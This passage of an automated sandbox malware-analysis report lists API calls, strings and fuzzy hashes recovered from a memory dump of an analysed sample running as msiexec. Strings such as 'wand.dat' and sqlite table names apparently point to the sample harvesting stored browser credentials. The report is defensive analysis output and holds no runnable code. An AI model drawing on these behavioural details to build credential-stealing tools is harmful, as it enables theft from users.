                                                                                                            • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                            • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                            • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                            • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$memcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 3384217055-0
                                                                                                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$memcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 368790112-0
                                                                                                            • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                            • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                            APIs
                                                                                                              • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                              • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                              • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                            • GetMenu.USER32(?), ref: 00410F8D
                                                                                                            • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                            • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                            • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                            • String ID:
                                                                                                            • API String ID: 1889144086-0
                                                                                                            • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                            • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                            • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                            • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                            APIs
                                                                                                            • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                            • GetLastError.KERNEL32 ref: 0041810A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                            • String ID:
                                                                                                            • API String ID: 1661045500-0
                                                                                                            • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                            • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                            • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                            • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                            APIs
                                                                                                              • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                            • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                            Strings
                                                                                                            • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                            • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                            • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpymemset
                                                                                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                            • API String ID: 1297977491-2063813899
                                                                                                            • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                            • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                            • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                            • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040560C
                                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                            • String ID: *.*$dat$wand.dat
                                                                                                            • API String ID: 2618321458-1828844352
                                                                                                            • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                            • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                            • wcslen.MSVCRT ref: 00410C74
                                                                                                            • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                            • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                            • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1549203181-0
                                                                                                            • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                            • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                            • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                            • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00412057
                                                                                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 3550944819-0
                                                                                                            • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                            • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                            APIs
                                                                                                            • free.MSVCRT ref: 0040F561
                                                                                                            • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                            • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$free
                                                                                                            • String ID: g4@
                                                                                                            • API String ID: 2888793982-2133833424
                                                                                                            • Opcode ID: f4c875be1691c16b6b0488e2c5ae259581ad0285ed380af5e7f19d00b6790c48
                                                                                                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                            • Opcode Fuzzy Hash: f4c875be1691c16b6b0488e2c5ae259581ad0285ed380af5e7f19d00b6790c48
                                                                                                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                            APIs
                                                                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                            • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy
                                                                                                            • String ID: @
                                                                                                            • API String ID: 3510742995-2766056989
                                                                                                            • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                            • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                            • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                            • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                            APIs
                                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                            • memset.MSVCRT ref: 0040AF18
                                                                                                            • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??2@??3@memcpymemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 1865533344-0
                                                                                                            • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                                            • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                            • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                                                            • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 004144E7
                                                                                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                              • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                            • memset.MSVCRT ref: 0041451A
                                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 1127616056-0
                                                                                                            • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                            • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                            APIs
                                                                                                            • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                            • memset.MSVCRT ref: 0042FED3
                                                                                                            • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$memset
                                                                                                            • String ID: sqlite_master
                                                                                                            • API String ID: 438689982-3163232059
                                                                                                            • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                            • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                            • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                            • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                            APIs
                                                                                                            • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                            • wcscpy.MSVCRT ref: 00414DF3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3917621476-0
                                                                                                            • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                            • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                            • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                            • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                            • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                            • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                            • _snwprintf.MSVCRT ref: 0041100C
                                                                                                            • wcscat.MSVCRT ref: 0041101F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 822687973-0
                                                                                                            • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                            • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                            • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                            • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                                            • malloc.MSVCRT ref: 00417459
                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                                                                                                            • free.MSVCRT ref: 0041747F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2605342592-0
                                                                                                            • Opcode ID: 99952dbbdb1bfba8fd85830a5d685bc4282b7af98e1c6427db74e5cbed68ad45
                                                                                                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                            • Opcode Fuzzy Hash: 99952dbbdb1bfba8fd85830a5d685bc4282b7af98e1c6427db74e5cbed68ad45
                                                                                                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                            • RegisterClassW.USER32(?), ref: 00412428
                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2678498856-0
                                                                                                            • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                            • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                            • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                            • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Item
                                                                                                            • String ID:
                                                                                                            • API String ID: 3888421826-0
                                                                                                            • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                            • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                            • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                            • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00417B7B
                                                                                                            • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                            • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                            • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$ErrorLastLockUnlockmemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 3727323765-0
                                                                                                            • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                            • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                            • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                            • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040F673
                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                            • strlen.MSVCRT ref: 0040F6A2
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2754987064-0
                                                                                                            • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                            • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                            • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                            • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040F6E2
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                            • strlen.MSVCRT ref: 0040F70D
                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2754987064-0
                                                                                                            • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                            • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                            • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
